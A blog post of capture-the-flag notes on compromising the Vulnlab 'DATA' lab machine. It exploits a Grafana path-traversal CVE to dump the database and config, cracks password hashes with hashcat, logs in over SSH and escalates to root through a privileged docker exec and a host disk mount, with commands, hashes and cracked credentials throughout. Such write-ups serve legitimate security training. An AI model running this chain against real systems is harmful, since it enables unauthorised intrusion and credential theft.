chidunguyen.com

DATA-HTB Notes

DATA-HTB

Written by

Du

in

Here is my notes on DATA box from Vulnlab which deployed to Hackthebox.

DATA-VL: 10.10.91.32 

PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp - Grafana Web Service 

Grafana Version 8.0.0 in the main page.

no admin:admin and default creds. 

no SQL Login Bypass. 

-Vulnerable to CVE-2021-43798.

https://github.com/taythebot/CVE-2021-43798 - Main Exploit

https://github.com/jas502n/Grafana-CVE-2021-43798 - Use it to crack the hashes with the secret_key from defaults.ini.

go run exploit.go -target http://10.10.91.32:3000 -dump-database -output grafana.db

admin:7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8:YObSoLj55S

boris:dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8:LCBhdtJWjl


go run exploit.go -target http://10.10.91.32:3000 -dump-config -output defaults.ini

┌──(root㉿kali)-[/home/…/BOXES/COMP/DATA/CVE-2021-43798]
└─# cat defaults.ini | grep "secret_key"
secret_key = SW2YcwTIb9zpOOhoPsMm
secret_key =


Grafana Password Cracking: 

#After you found grafana.db through a various exploits. 

#Require Hashcat to do it. 

https://vulncheck.com/blog/grafana-cve-2021-43798

https://github.com/iamaldi/grafana2hashcat/tree/main

#Require a hash and a salt to to make this work. 

┌──(root㉿kali)-[/home/…/COMP/DATA/CVE-2021-43798/grafana2hashcat]
└─# cat grafana_hashes
7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8,YObSoLj55S
dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl                                                                                                                                                                                                                                            
┌──(root㉿kali)-[/home/…/COMP/DATA/CVE-2021-43798/grafana2hashcat]
└─# python3 grafana2hashcat.py grafana_hashes

[+] Grafana2Hashcat
[+] Reading Grafana hashes from:  grafana_hashes
[+] Done! Read 2 hashes in total.
[+] Converting hashes...
[+] Converting hashes complete.
[*] Outfile was not declared, printing output to stdout instead.

sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=


[+] Now, you can run Hashcat with the following command, for example:

hashcat -m 10900 hashcat_hashes.txt --wordlist wordlist.txt

Take those two hashcat hashes format to a file then crack it with hashcat

hashcat -m 10900 grafana_hashes_hashcat --wordlist /usr/share/wordlists/rockyou.txt


boris:beautiful1

┌──(root㉿kali)-[/home/kali/BOXES/COMP/DATA]
└─# hydra -l boris -p beautiful1 10.10.91.32 ssh                     
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-14 22:21:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://10.10.91.32:22/
[22][ssh] host: 10.10.91.32   login: boris   password: beautiful1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-14 22:21:11


USER SHELL ! 

USER.TXT: [REDIRECTED]

PRIV ESC: 

sudo -l docker exec priv esc notes:

boris@ip-10-10-10-11:~$ sudo -l
Matching Defaults entries for boris on ip-10-10-10-11:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User boris may run the following commands on ip-10-10-10-11:
    (root) NOPASSWD: /snap/bin/docker exec *
boris@ip-10-10-10-11:~$ 

https://blog.yunolay.com/?p=262#Privilege_Escalation_Root

Go back to that same LFI exploit to enumerate /etc/hostname and you will found the docker container.

e6ff5b1cbc85

sudo /snap/bin/docker exec --privileged --user 0 -i -t e6ff5b1cbc85 /bin/bash

fdisk -l

bash-5.1# cd /mnt
bash-5.1# mkdir test
bash-5.1# mount /dev/xvda1 /mnt/test

bash-5.1# pwd
/mnt/test/root
bash-5.1# ls
root.txt snap
bash-5.1# cat root.txt
VL{<REDACTED>}




CVE-2021-4034 - WORKS ! - ROOT SHELL 


ROOT.TXT: [REDIRECTED]

More posts